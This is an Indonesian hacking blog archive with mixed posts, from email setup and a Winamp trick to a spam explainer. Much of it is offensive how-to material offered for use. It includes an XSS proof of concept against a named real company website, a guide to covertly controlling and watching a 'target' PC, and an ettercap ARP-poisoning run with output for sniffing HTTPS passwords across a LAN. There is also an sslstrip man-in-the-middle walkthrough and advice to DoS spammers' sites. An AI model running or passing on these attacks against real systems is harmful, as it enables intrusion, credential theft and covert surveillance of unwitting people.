Selasa, 03 Desember 2013

Cek E-mail DI terminal

Hmmmm kali ini saya akan memberikan tutorial bagimana cara melihat dan aktivasi email di TERMINAL.... di Linux (backtrack), langsung aja bro  kita mulai
1.apt-get install alpine
2.panggill aplikasinya di terminal 'alpine'
3.hmmm sambutan dari alpine.....baca perintah dibawahnya lanjutkan
4. nanti akan muncul setting e-mail,pilih s setup----configure alpine option
5.nah kali ini kita akan perlihatkan sebuah pengaturannya
 edit opsi-opsinya dengan menggunkan enter...

personal name = igor

user domain     =gmail.com

SMTP server=smtp.gmail.com:587/tls/user=andyrusia@gmail.com

Inbox path={pop.gmail.com/pop3/ssl/novalidate-cert/user=andyrusia@gmail.com}INBOX

selesai sudah pengaturannya kita keluar aja dari terminal setelah itu masuk lagi
alpine
maka akan muncul seperti ini:

Masuk Ke Opsi L (folder list),,
 Enter Inbox pilih yes...tunggu bentar jrengg--jrengg kelihatan daftar e-mail--- dari temen2 ente:

Sorry gambarnya kurang lengkap!!!!!!! soalnya waktu buat lupa meng-capture xixiixxiix..... thank for zee eichel for tutorial..

PT. PLN (Persero) Website Vulnerable to Cross Site Scripting


{image: PT. PLN (Persero) Website XSSED by SPYRO-KiD}

+++ POC ++++
http://www.pln.co.id/kontak-kami/telusur.php?nokeluhan=%22%20style=%22display:none%22%3E%3C/iframe%3E%3Cp%20align=%22center%22%3E%3Ca%20href=%22http://www.spyrozone.net%22%20target=%22_blank%22%3E%3Cimg%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%20border=%220%22%3E%3C/a%3E%3C/p%3E%3Ciframe%20style=%22display:none%22%3E

Remote Desktop dengan IDEAL Administrator

Ada banyak program remote desktop yang kita ketahui, seperti Radmin, AWRC dll, bahkan sebagian ada yang memakai Trojan untuk memonitor targetnya. Tapi saya lebih senang memakai AWRC, karena kita jarang terdeteksi oleh target dan tidak repot menginstal server/slave untuk operasinya, seperti yang dikatakan Pa S’to dalam bukunya Seni Teknik Hacking I Uncensored.

Disini kita tidak membahas tentang AWRC tapi kita akan mencoba program yang setara dengan AWRC, atau mungkin lebih.

Kita akan menggunakan program IDEAL Administrator, yang penting kita harus punya programnya dulu, cari aja di www.google.com.

Nah sekerang baru kita mulai, install dulu programnya, setelah selesai penginstallan buka program IDEAL Administrator, akan muncul dialog Informasi seperti pada (Gambar 1.) dan pilih Yes.
Gambar 1. Dialog informasi pertama kali saat kita membuka program IDEAL Administrator.
 
Gambar 2. Tampilan Program Ideal Administrator yang memiliki banyak pasilitas.
Akan nampak computer – computer yang terhubung di jaringan (Gambar 2.), pilih salah satu computer yang akan menjadi target kita, pilih menu Computer – Taking remote control - Taking remote control (ThigtVNC), (gambar 3.)
 
Gambar 3. Menu Computer
Akan muncul dialog yang meminta anda memasukkan username dan password computer target (Gambar 4.), disini dimana kita harus mengetahui username dan password computer target seperti pada program AWRC. Terserah anda mau mengkombinasikan seperti artikel – artikel yang ada di jasakom dengan memakai KAHT atau yang lainnya untuk membuat user anda sendiri.
 
Gambar 4. Dialog yang meminta anda mengisikan Username dan Password Komputer target
Saya akan memasukkan username : administrator dan password : rahasia Setelah memasukan username dan password klik Ok akan muncul lagi dialog Important menyatakan kita belum mempunyai password VNC karena kita memang belum memasukan password VNCnya dan pilih Yes untuk memasukan Password VNC (Gambar 5.)
 
Gambar 5. Dialog Important
 
Dilanjutkan dengan munculnya dialog TightVNC Authentification Password, masukan password anda, saya akan memasukan password “SANVOL” dan klik OK, kedua dialog ini tidak akan muncul lagi nanti saat anda ingin meremote computer yang lainnya.
 
Gambar 6. dialog TightVNC Authentification Password
Selanjutnya muncul dialog VNV Authentication masukkan password yang kita masukan pada dialog TightVNC Authentification Password sebelumnya, tadi saya memasukkan password “SANVOL” lalu klik OK
 
Gambar 7. dialog VNV Authentication
Dan selamat kita berhasil memonitor computer target, seperti pada Gambar 5. target sedang browsing dengan google liat-liat gambar, dan terserah anda mau di apain lagi. ;-D
 
Gambar 8. Remote desktop target.
 
Bukan hanya dapat meremote, program ini dipasilitasi dengan tranfer file, edit registry target, nambah user pengguna dll, makanya saya anggap program ini melebihi kemampuan AWRC.

Cukup dulu artikel dari saya, mohon maaf artikelnya agak amburadul, maklum saya baru pertama nyoba nulis artikel dan kebetulan masih banyak kerjaan yang numpuk. Selamat mencoba dan Selamat belajar.

Opsi tersembunyi pada WINAMP V5

---------------------------------------------------------
 
::  Sofie               :  Winamp Versi 5 keatas (NULLSOFT,inc - www.winamp.com)
::  Opsi tersembunyi    :  Kita  bisa membuat winamp tampil agak transparan dan
                           berkedip-kedip sesuai dengan irama lagu.
::  Langkah-langkah:
(1). Bukalah winamp anda. Pastikan anda menggunakan skin modern.
(2). Ketik NULLSOFT dengan keyboard anda. Setiap kali anda sampai pada huruf L, jendela open file akan terbuka. saat hal itu terjadi, tekan tombol ESC atau pilih cancel. Lanjutkan mengetik hingga huruf terakhir (T).
(3). Cobalah untuk memainkan sebuah lagu, kini jendela utama winamp anda sudah tampil transparan dan berkedip-kedip sesuai dengn irama lagu.
Hmm.. it's fun enough isn't it?

Special Windows Command Processor a.k.a Command Prompt

Special Command prompt?? hehehe.. mungkin judulnya agak terlalu berlebihan ;) Saya hanya akan mengajak anda sedikit bermain-main (idiih.. dari dulu 'bermain-main' melulu!!!) dengan batch programming dan registry. Kita akan menampilkan banner dan mengubah teks pada title bar CMD.EXE
 
 
0 [0XFFF00000] Let's do it.. ;D
 
[1]. Mempersiapkan banner
Bukalah notepad anda kemudian copy-paste code berikut. Modifikasi sesuka hati anda:

Pada code diatas, pertama-tama kita menggunakan perintah @echo off agar perintah yang kita ketikkan tidak ditampilkan pada user. Command title dipergunakan untuk mengubah teks pada title bar CMD.EXE. Perintah cls berguna untuk membersihkan layar. Sedangkan perintah echo dipergunakan untuk mencetak teks pada layar.
Tentu anda bisa mengetikkan perintah-perintah dos lain sesuka hati anda ;)
Setelah banner selesai dibuat, simpan dengan nama system.bat di directory C:\
 
[2]. Registry
Sekarang, buka halaman baru pada notepad dengan menekan kombinasi CTRL + N. Copy Paste code berikut:

Simpan dengan nama system.reg. Klik 2X pada file system.reg.. YES .. OK ;) Sekarang bukalah Windows Command Processor anda dengan klik [start] + [Run] lalu ketik cmd.exe dan tara..... ;D
 
0 [0XFFFF0000] Penutup
Lha, trus apa lagi?? Lho, khan sudah saya bilang bahwa anda bisa mengetikkan perintah DOS yang ingin anda jalankan pada file system.bat yang ada di directory C:\. hehehe.. pakai perintah goto untuk melakukan perulangan tak terbatas?? pakai perintah exit biar user nggak bisa buka cmd.exe? disisipkan pada virus dan memakai perintah delete agar file-file user terhapus saat membuka cmd? hehehe.. jangan aneh-aneh deech, entar kamu jadi aneh lho ;P 

Senin, 02 Desember 2013

Bertarung Melawan SPAM dan SPIM


|-------[Table of Contents]-------|
-----------------------------------
1. Preface
2. Mengenal SPAM dan SPIM
---2.1 Apa itu SPAM?
---2.2 Apa itu SPIM?
3. Aksi sang SPAMMER
---3.1 Dari mana mereka tau alamat email kita?
---3.2 Bagaimana mereka melakukannya?
---3.3 Bagaimana para SPAMMER melawan AntiSpam?
4. Membantai SPAM dan SPIM
5. Penutup
---5.1 Kesimpulan
---5.2 Referensi
---5.3 Shoutz
-----------------------------------
|---[1]-[Preface]---|
Saya akan mengajak anda untuk lebih jauh mengenal SPAM dan SPIM. Pembahasan kita meliputi psikologi seorang SPAMMER dan langkah-langkah untuk melawan mereka. Enjoy... ^_^
|---[2]-[Mengenal SPAM dan SPIM]---|
2.1 Apa itu SPAM?
----------------- 
SPAM adalah sebutan bagi email yang tidak anda harapkan. SPAM biasa juga disebut UCE (Unsolicited Commercial Email), UBE(Unsolicited Bulk Email) atau juga Junk Mail. Biasanya SPAM berisi pesan komersial yang menawarkan produk tertentu, iklan dari lembaga pendidikan swasta, ajakan berbisnis, penipuan, hingga kini yang paling marak adalah iklan dari webmaster situs-situs porno dan produk-produk mereka (obat-obatan, s*x toyz, dll.. ) :P
Dampak nyata dari SPAM ternyata sangat merugikan bagi pengguna individu, terlebih lagi nagi sebuah perusahaan besar. Perusahaan-perusahaan raksasa di Eropa bahkan harus kehilangan dana milyaran Euro setiap tahunnnya hanya gara-gara SPAM. Bandwidth, waktu, tenaga dan pikiran akan banyak tersita karena SPAM. Hal ini berpengaruh pada membengkaknya tagihan Internet. Dan parahnya lagi, karyawan jelas akan kehilangan banyak waktu hanya karena harus memilah-milah mana email SPAM, mana yang dari customer.
Bisnis SPAM menjadi kian marak dan banyak diminati oleh perusahaan-perusahaan besar belakangan ini. SPAM dinilai sangat efektif dalam dunia periklanan karena dipandang mampu menjaring banyak konsumen dalam waktu singkat. Ya, pesan-pesan komersial itu bisa sampai ke tangan jutaan orang hanya dalam hitungan menit!
Setiap orang yang sudah masuk dalam daftar target para sammer akan sulit untuk melepaskan diri dari banjir email sampah ini. Rata-rata para korban akan menerima puluhan email setiap harinya.
2.2 Apa itu SPIM?
-----------------
SPIM adalah sebutan bagi "hama" messenger. Anda yang gemar melakukan chatting dengan menggunakan apliaksi Instant Messenger (IM) tentunya sudah tidak asing lagi dengan SPIM. SPIM seringkali muncul secara tiba-tiba saat kita melakukan chatting. Biasanya SPIM akan menyapa anda sebentar sambil menawarkan kepada anda untuk mengunjungi sebuah link. Alamat link yang ditawarkan pun seringkali menggoda untuk dibuka dan adakalanya berhubungan dengan nick yang anda gunakan. Misalnya nick anda adalah Spyro_ZONE, maka biasanya link yang ditawarkan untuk dikunjungi adalah http://suatu-nama-cewek-atau-cowok/xxxspyro_zone/xxxx.com
Terkadang SPIM akan berusaha menggoda anda membuka link tersebut dengan cara meyakinkan anda bahwa link tersebut akan membawa anda ke suatu tempat dengan foto-foto "menarik" (hehehe.. apalagi kalau bukan gambar-gambar dan video-video berbau p**n*grafi).
Hingga kini SPIM masih merajalela walaupun banyak juga orang yang mengabaikannya. Bagaimanapun juga, SPIM tetap saja mengganggu karean dapat membebani pc dan mengurangi kenyamanan anda dalam ber-chatting ria :)
Apakah hanya itu saja dampak dari SPIM? Tidak!! bahkan SPIM bisa menjadi seusatu yang sangat berbahaya. SPIM bisa dimanfaatkan oleh pengirimnya untuk menyebarkan worm, virus, trojan, spyware dan program-program berbahaya lainnya. Apalagi kebanyakan SPIM akan menuntun anda menuju situs-situs porno. Padahal kebanyakan situs-situs jorok saat ini sengaja dipasangi spyware oleh sang webmaster untuk mengeruk informasi dari pc pengunjungnya.
|---[3]-[Aksi sang SPAMMER]---|
3.1 Dari mana mereka tau alamat email kita?
-------------------------------------------
Mungkin anda bertanya-tanya dalam hati, dari mana para SPAMMER itu mengetahui alamat email kita? Bukankah kita tidak mengenal mereka? Bukankah kita tidak pernah merasa pernah memberikan alamat email kita kepada mereka? Berikut adalah jawaban dari pertanyaan-pertanyaan itu:
(1). Anda sendiri yang menyerahkan alamat email anda pada mereka
Lho, mana mungkin? Mana ada orang yang sengaja menunjukkan alamat rumahnya kepada penjahat untuk dijadikan sebagi target? Memang tidak secara langsung. Tanpa disadari, ternyata kita telah turut andil dalam membantu para SPAMMER dan menyodorkan alamat email kita kepada mereka.
Saat berkunjung ke situs-situs besar, kita sering tergoda untuk mengisi buku tamu ataupun shoutbox yang disediakan pada situs tersebut(jika ada). Ketika itulah kita diminta untuk memasukkan identitas berupa nick dan alamat email sebelum menuliskan komentar. Kita sendiri juga sering mencantumkan alamat email pada blog atau situs pribadi kita. Hal tersebut memang sangat lazim sebagai wujud untuk memperkenalkan diri. Namun kebiasaan itulah yang ternyata dimanfaatkan oleh para SPAMMER untuk menjaring alamat email.
SPAMMER membuat (atau memanfaatkan) suatu program perambah web untuk mencari karakter yang pasti ada dalam setiap alamat email. Ya, karakter special itu adalah karakter "@". Sebagai contoh, cobalah anda buka search engine kesayangan anda lalu ketik kata kunci @ dan tekanlah tombol search. Maka anda akan menjumpai jutaan alamat email di hadapan anda.
Beberapa penyedia layanan email gratisan ternama akan menawarkan pilihan kepada anda apakah anda ingin agar alamat email anda dimasukkan kedalam listing directory mereka atau tidak. Kita ambil contoh yahoo.com. Anda akan diberi penawaran itu ketika anda mendaftarkan diri. Jika anda menerima penawaran tersebut, maka orang lain akan dengan mudah bisa menemukan alamat email anda hanya dengan mengetikkan nama atau handle anda pada fitur search people yang disediakan yahoo. Hal ini memberikan kemudahan, namun di sisi lain SPAMMER juga ikut-ikutan menikmati kemudahan ini. SPAMMER dengan mudah menjaring alamat-alamat email tersebut dengan menggunakan suatu software perambah web yang akan menelusuri Yahoo.com dan berturut-turut menangkap alamat email yang ada di setiap halaman.
(2). Menukar-nukar karakter dalam suatu alamat email
SPAMMER menukar-nukar karakter tertentu dalam suatu alamat email. Misalnya salah satu email target adalah choki@phreaker.net. Maka SPAMMER bisa membuat suatu script perl sederhana untuk mengubah-ubah alamat email tersebut menjadi choki1@phreaker.net, choki2@phreaker.net, choki123@phreaker.net, choki486@yahoo.com, choki2000006@yahoo.com dan begitu seterusnya hingga alamat email yang didapat mencakup semua provider.
(3). Milis-milis besar
Dewasa ini SPAMMER seringkali aktif bergabung dalam milis-milis besar. Banyak sekali milis dengan anggota banyak namun tidak dimoderasi dengan baik menjadi sasaran empuk bagi sang SPAMMER. Cara yang sangat efisien untuk melakukan aksi SPAMming karena pada umumnya email yang dikirimkan ke suatu alamat milis akan diterima oleh semua anggota milis tersebut dalam waktu singkat.
Dengan demikian pekerjaan SPAMming akan menjadi lebih mudah karena kini ia, sang SPAMMER, tidak perlu susah-susah mengumpulkan alamat email. Cukup mengumpulkan daftar alamat milis-milis beranggotakan banyak namun tidak dimoderasi dengan baik, lalu kirim sebuah email SPAM ke daftar alamat itu maka dalm waktu singkat email SPAM itu sudah diterima oleh jutaan orang.
(4). Penipuan dengan berkedok Barang Gratisan
Pernah menemui situs yang menawarkan komputer laptop, ipod dan lain sebagainya secara GRATIS?? Ya, mungkin anda sering menemui situs semacam itu. Menurut webmasternya, kita berkesempatan mendapatkan barang-barang itu gratis dengan cara mudah, yaitu cukup dengan melakukan registrasi dan kita akan mendapat semacam nomor sandi khusus. Kita hanya diminta untuk mencari orang sebanyak-banyaknya untuk melakukan hal yang sama, namun orang yang kita cari harus memakai sandi milik kita sebagai indikator bahwa orang tersebut adalah hasil dari invitation kita. Semakin banyk orang yang kita invite, semakin besar kesempatan kita mendapat IPOD atau LAPTOP gratis.
Sebaiknya jangan terlalu percaya dengan program semacam ini. Kebanyakan program seperti ini hanyalah tipuan belaka. Tujuan mereka apa???
  • Saat melakukan registrasi, kita pasti dimintai alamat email. Nah, disinilah sang webmaster yang ternyata ialah seorang spamer mendapat untung. Semakin banyak orang yang kita ajak untuk meregister, semakin banyak email valid yang didapat oleh sang spammer.
  • Celah untuk melakukan Social Enginering dan penipuan-penipuan lain lebih lanjut mulai terbuka karena saat registrasi anda diminta memsukkan identitas asli anda beserta alamat rumah dan nomor telepon.
Nah, cukup berbahaya bukan?? Sayangnya, banyak orang buta akan celah yang satu ini karena silau dengan kata "FREE NOTEBOOK!" :P
(5). CD khusus
Dari hasil percakapan saya dengan seorang kenalan yang berprofesi sebagai seorang SPAMMER, ternyata ada tempat-tempat tertentu yang menjual cd-cd khusus yang berisi jutaan alamat email. Harga yang ditawarkan pun cukup miring. Para SPAMMER bekerjasama dengan SPAMer-SPAMMER lain untuk memperjual-belikan CD-CD tersebut pada perusahaan-perusahaan yang berminat maupun kepada sesama SPAMMER. Bisnis semacam ini ternyata cukup menguntungkan dan semakin marak.
3.2 Bagaimana mereka melakukannya?
----------------------------------
Sangat mudah untuk melakukan aksi SPAMming. Tidak dibutuhkan keahlian khusus untuk bisa menjadi seorang SPAMMER. Setelah seorang SPAMMER memperoleh daftar alamat email yang akan dijadikan target, ia akan menggunakan software-software pengirim email massal untuk melakukan aksinya.
Atau bahkan SPAMMER bisa dengan mudah membuat script perl sederhana untuk melakukan pengiriman email massal. Tidak terlalu sulit untuk membuatnya, namun hasilnya cukup bisa diperhitungkan. Banyak SMTP (Siple Mail Transfer Protocol) open relay tersedia secara Cuma-Cuma. Ada pula yang berbayar dan semua itu bisa didapat dengan mudah. Saya sudah pernah menyingung mengenai SMTP open relay di artikel lain www.spyrozone.net
Sedangkan untuk mengirim SPIM, SPAMMER tingal mengaktifkan sebuah program kecil yang berfungsi sebagai “bots”. Bots tersebut akan melakukan suatu percakapan dengan pengguna IM seakan-akan ia adalah manusia. Bots mampu mendeteksi siapa-siapa saja yang baru join kedalam suatu room, menyapa mereka secara otomatis lalu pergi setelah meninggalkan sebaris iklan. Bots juga memiliki kemampuan mengumpulkan informasi nama-nama chatter lain kemudian mengirimkan pesan iklan dengan ID yang ia dapatkan itu.
Metodenya, bots akan mengajak targetnya untuk memasukan ID bots ke dalam buy list. Setelah target menerima ajakan tu, saat itulah bots mengeruk informasi berupa daftar identitas yang ada dalam buddy list target.
3.3 bagaimana SPAMMER melawan AntiSpam
--------------------------------------
SPAMMER menyadari bahwa cepat atau lambat filter-filter AntiSpam akan membantai email SPAM yang mereka tebarkan. SPAMMER memiliki kiat khusus untuk mengatasi hal ini:
(1). Memanipulasi subject email
Beberapa fitur SPAM akan mengategorikan SPAM berdasarkan subject email. Subject email berbau iklan akan mudah dikenali sebagai SPAM. SPAMMER menyadari hal ini dan mengolah kata sepintar mungkin untuk mengelabuhi SPAM filter. Salah satu cara ialah dengan menambahkan kata RE: di depan subjet email. Pada umumnya untuk email “normal”, kata RE: mewakili kata REPLY yang menandakan email tersebut adalah email balasan dari email yang dikirim sebelumnya.
Dengan menambahkan kata RE:, SPAMMER berusaha menipu filter SPAM sekaligus mengecoh korban, menumbuhkan persepsi seolah-olah itu adalah email yang valid, email sah yang seakan-akan adalah email balasan untuk user.
(2). Mengacaukan kata-kata dalam email
Metode ini dilakukan SPAMMER dengan car mengacaukan kata-kata yang ditulis dalam body email. Pesan yang kita terima adalah sebuah pesan tanpa makna yang membingungkan. Dalam email itu adakalanya kita disapa seolah-olah sang pengirim sudah kenal sangat baik dengan kita. Barulah setelah itu mereka mencantumkan iklan di akhir paragraf.
(3). Membuat iklan dalam format gambar
Para SPAMMER sempat “tersedak” saat metode bernama “filter bayes” hadir. Filter penjaring SPAM dengan metode ini mampu membaca body email dan mampu “belajar” sendiri untuk mengenali SPAM. Bahkan filter ini bisa menjadi semakin canggih dan kemampuannya akan semakin meningkat jika dilatih. Akan tetapi, sang SPAMMER menjadi semakin pintar, mereka memformat text ikan mereka menjadi gambar sehingga tidak bisa dijaring oleh filter bayes karena filter bayes hanya bisa membaca teks.
Metode ini cukup sukses dan banyak diterapkan oleh para SPAMMER dewasa ini.
|---[ 4 ]---[ Membantai SPAM dan SPIM ]---|
Jengkel dengan SPAMMER? Anda bisa bertrng dengan mereka dan membuat mereka menjadi lebih jengkel daripada anda :) Kiat-kiat melawan mereka ialah:
(1). Mengirim informasi palsu pada SPAMMER
Anda bisa mengecoh SPAMMER dengan mereply email yang dikirim oleh sang apammer. Tulis suatu email balasa yang menyatakan seolah-olah email yang dikirim sang SPAMMER tidak sampai ke tangan user. SPAMMER akan mengira email anda sudah tidak aktif lagi dan dia akan menghapus alamat email anda dari database mereka. Ada cara otomatis untuk melakukan hal ini. Gunakan tool pembasmi SPAM yang menggunakan metode ini do http://mailwasher[dot]net
(2). Menguras bandwdth SPAMMER
Akseslah link yang dipromosikan oleh sang SPAMMER sebanyak mungkin. Jika anda mampu, buatlah tool otomatis untuk itu, untuk melakukan serangan Denial Of Service terhadap alamat itu. Sang SPAMMER akan menderita kerugian besar karena trafficnya membanjir tapi tidak ada pemasukan. Jika serangan anda sukses, mereka akan menderita kerufian uang, tenaga dan waktu :)
(3). Manfaatkan fasilitas dari provider
Jika anda pengguna layanan email berbasis web atau menggunakan layanan gratisan seperti Yahoo, Hotmail atau GMAIL misalnya, manfaatkan saja fasilitas  filter SPAM yang mereka berikan. Setiap ada email SPAM yang berhasil hinggap di inbox anda, segera tandai email itu sebagai SPAM. Dengan cara ini, alamat IP milik sang SPAMMER akan di blacklist.
(4). Hindari ajakan chatter asing
Untuk berjaga-jaga dari bahaya SPIM, hindari untuk menerima ajakan chatter asing yang meminta anda memasukkan mereka ke dalam buddy list anda.
(5). Tool AntiSpam dan antiSPIM
Beragam tool AntiSpam dan antiSPIM dapat anda dapatkan cuma-Cuma dengan mudah. Beberapa memang meminta biaya registrasi untuk fitur yang lebih komplit. Namun versi gratisannyapun tak kalah tangguh.
(6). Mengbah kebiasaan & selalu waspada
Ubah kebasaan anda dalam menulis alamat email ketika berada di tempat-tempat rawan. Ini hanya sekedar saran saja, anda bisa meniru kebiasaan para Hacker dengan mengubah karakter @ dengan [at] dan . dengan [dot]. Contohnya: spyro_Zone[at]yahoo[dot]com Tetapi tentunya ini hanya berlaku untuk penulisan saja.
Hindari juga mengisi komentar pada guestbook atau shoutbox gratisan yang terlihat lemah. Goestbook gratisan biasanya menjadi sasaran empuk bagi SPAMMER untuk mencari mangsa.
|---[ 5 ]--- [ Penutup ] ---|
5.1 Kesimpulan
-----------------
Pertarungan melawan SPAM dan SPIM seakan-akan adalah pertarungan tanpa akhir. Kedua belah pihak, SPAMMER dan para pengembang AntiSpam akan senantiasa berusaha mencari inovasi-inovasi baru. Yang bisa kita lakukan hanya mempersempit ruang gerak mereka dengan selalu waspada dan memanfaatkan filter-filter SPAM yang ada dengan baik.
  
5.2 Referensi
-------------
    -         mailwasher.com
    -         iks-jena.de
    -         ddv.de 
  
6.3 Shoutz
-------------
    -         Vindika Anastasya :) you’re the depest love I’v ever had :)
    -         All member of www.spyrozone.net .. stay alert!
    -         Semua kontributor yang selama ini banyak menyumbangkan ide-ide kreatifnya kepada kami di spyro zone.. terima kasih atas karya-karya anda. Kami akan selalu terbuka menerima kreatifitas-kreatifitas anda.

ETTERCAP DI BACKTRACK 5

sekarang udah ga usah pake script segala untuk sniffing password https seperti gmail, yahoo, facebook dll
cukup dengan menjalankan ettercap saja
Code:
root@bt:~# ettercap -T -q -M arp -i wlan0 // //
begini hasilnya??

==>>
root@bt:~# ettercap -T -q -M arp -i wlan0 // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0... (Ethernet)

wlan0 -> 00:22:FA:20:B3:8E 172.16.40.251 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

254 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

DHCP: [1C:65:9D:26:C1:31] REQUEST 172.16.40.65
DHCP: [00:17:C4C:C33] REQUEST 172.16.40.217
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] REQUEST 172.16.40.248
DHCP: [84:A8:E4:462:3B] DISCOVER
DHCP: [172.16.40.1] OFFER : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [172.16.40.1] ACK : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [84:A8:E4:462:3B] REQUEST 172.16.40.245
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140
DHCP: [00:21:00:74:21:49] REQUEST 172.16.40.113
DHCP: [172.16.40.1] ACK : 172.16.40.113 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140

yang saya warnain biru itu harus diedit om biar jadi 0
caranya:

root@bt:~# nano /etc/etter.conf

Code:
############################################################################
#                                                                          #
#  ettercap -- etter.conf -- configuration file                            #
#                                                                          #
#  Copyright (C) ALoR & NaGA                                               #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
#  $Id: etter.conf,v 1.78 2004/10/12 15:28:38 alor Exp $                   #
#                                                                          #
############################################################################

[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default



#####################################
#       redir_command_on/off
#####################################

#---------------
#     Linux
#---------------

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#---------------

silahkan edit ettercapnya seperti diatas lalu save.

DnsWalk

Aplikasi dnswalk yang berada di Backtrack-informaton gathering-Network analys-Dns analys-Dnswalk yang beguna untuk mencari informasi tentang daftar dari alamat IP dan Hostname yang berhubungan yang terdapat didalam Dns Server target,bekerja dengan memanfaatkan Dns Zone Transfer
Cara kerja DNS zone transfer adalah dengan menduplikasi database DNS dari server DNS yang asli kepada server DNS yang lain atau biasa disebut dengan istilah slave DNS server.
Dengan cara ini, database dari server DNS yang asli dan slave DNS server akan saling menyamakan data. Proses menyamakan ini lah yang pada DNS protokol bisa digunakan oleh hacker untuk mendapatkan informasi dari domain target.
Disamping itu Dnswalk juga berguna untuk mengecek konsiten dan akurasi dari database server .

Penggunaanya:
./dnswalk [doamin target].
./dnswalk yahoo.com.













Dari hasil walk saya di yahoo.com konfigurasi server Dns-nya tidak mengaktifkan ZOne Transfer.Fungsi zone-transfer digunakan bagi Administrator untuk alarm ketika ada serangan dari hacker.

Happy Hacking

Tutorial Sslstrip

Apakah anda sering melakukan sniffing atau ngintip-ngintip password yang berseliweran di hotspot tempat anda Online..ehhehhe disini saya akan memberikan salah satu trik MITM (Man In The Middle Attack); Tapi sebelumnya kita install toolsnya (SSLSTRIP):

 wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz


tar zxvf sslstrip-0.9.tar.gz 




preman@bt:~/sslstrip-0.9# python setup.py install
Jalankan Ssltripnya:
sslstrip

=====================================================================
TREAD  LANJUTANNYA:
Di BACKTRACK 5 R3 kita sslstrip sudah terinstall di :
BACKTRACK==>EXPLOITATION TOOLS==>WEB EXPLOITATION TOOLS==>SSLSTRIP
OR
cd /pentest/web/sslstrip
Mengconfigurasi mesin penyerang untuk ip forwarding
netstat -nr = Untuk mengetahui gateway ip address kita
Meroute semua http ke sslstrip ke port 8080
Jalankan ARPSPOOF
arpspoof -i -t
Jalankna sslstripnya:
./sslstrip.py -l 8080
disini kita tunggu si victim untuk mengakses internet yang sudah kita route http-nya
maaf saya gak punya sample: gak install OS lain karena low memory. 


Source :Gilakomputer.net

Dracos version 2 FireHorse


./DRACOS LINUX VERSI 2 CODENAME FIREHORSES.\

Dracos-linux saat ini telah mencapai versi 2 dengan melakukan beberapa perubahan serta pemantapan dalam segi penggunaan dan kelengkapan tools. Dengan melihat kebutuhan dalam bidang security auditor maka kami mengeluarkan versi terbaru yang mengemas berbagai tools dari beragam komunitas nasional maupun internasional. Seluruh tools yang kami distribusikan berdiri pada standart hukum GNU free software dimana seluruh tools memegang asas opensource, non commercial dan non waranty.

Desktop environment

Kami memilih xcfe sebagai desktop environment. Tidak seperti pada dracos versi sebelumnya yang menggunakan fluxbox, kami mempertimbangkan dari segi kemudahan dalam penggunaan, daya tarik dan pelbagai pertimbangan kemajuan tehnologi desktop environment saat ini.

Sekilas mengenai Dracos Linux Versi 2

Dracos versi 2 di bangun berbasis Linux Ubuntu Server 11.04 ( LTS ) Life Time Support. Dracos v2 saat ini masih dalam versi beta dan membutuhkan banyak penyempurnaan dan ujicoba di dalam komunitas. Karena itu kami masih menggunakan standart kernel ubuntu 3.2.0 yang telah mengalami pengembangan patching pada berbagai vendor hardware pendukung.
Saat ini dracos versi 2 kami beri kode : firehorses telah mencapai akhir pengembangan pada versi beta-1. Penyempurnaan akan kami teruskan sampai dracos v2 mencapai versi final. untuk itu saya lampirkan beberapa detail struktur sistem operasi dracos linux pada versi ini. Untuk saat ini dracos linux versi 2 memiliki 4 sub besar kategori tools yang meliputi bidang

Ucapan Terima Kasih

Kami mengucapkan terima kasih kepada seluruh pihak yang telah mendukung setiap pembangunan sistem operasi ini hingga selesai, baik dalam bentuk moril maupun dana. Kami mengucapkan terima kasih sebesar-besarnya kepada codewall-security ( CwS ) yang telah membiayai seluruh projek ini, Indonesian Backtrack Team yang telah ikut menjadi team dev serta auditor, Indonesian Hacker Team , khususnya agan angga yang telah memberikan lapak unduh dan repo dracos,Indonesian Blackhat Team, yang telah memberikan dukungan secara moral. Secara khusus kami berterima kasih kepada bapak Iwan Sumantri selaku pembina dan sesepuh IBT yang saat ini juga bertanggung jawab dalam badan nasional internet security ( IDSIRTII ) Dan terima kasih kami kepada seluruh pengembang ubuntu , debian dan seluruh pengembang tools yang telah mendedikasikan ilmu dan pemikirannya bagi dunia komunitas peretas Internasional. Thumbs Up for you, guys !!

Penetration Testing

Penetration testing tools category meliputi kumpulan tools yang mengikuti standart ISO ( international standart organization ) dan menjadi patokan penggunaan tools peretas di tanah air maupun internasional. Penetration testing terdiri dari beberapa subkon penting di antara lainya


Defensive ( IPS/IDS ) Tools

Defensive tools category meliputi kumpulan tools pertahanan dan beberapa tools untuk hardening linux. Alasan team dev kami, untuk ikut memasukan tools-tools tersebut didalam dracos-linux adalah sebagai berikut.
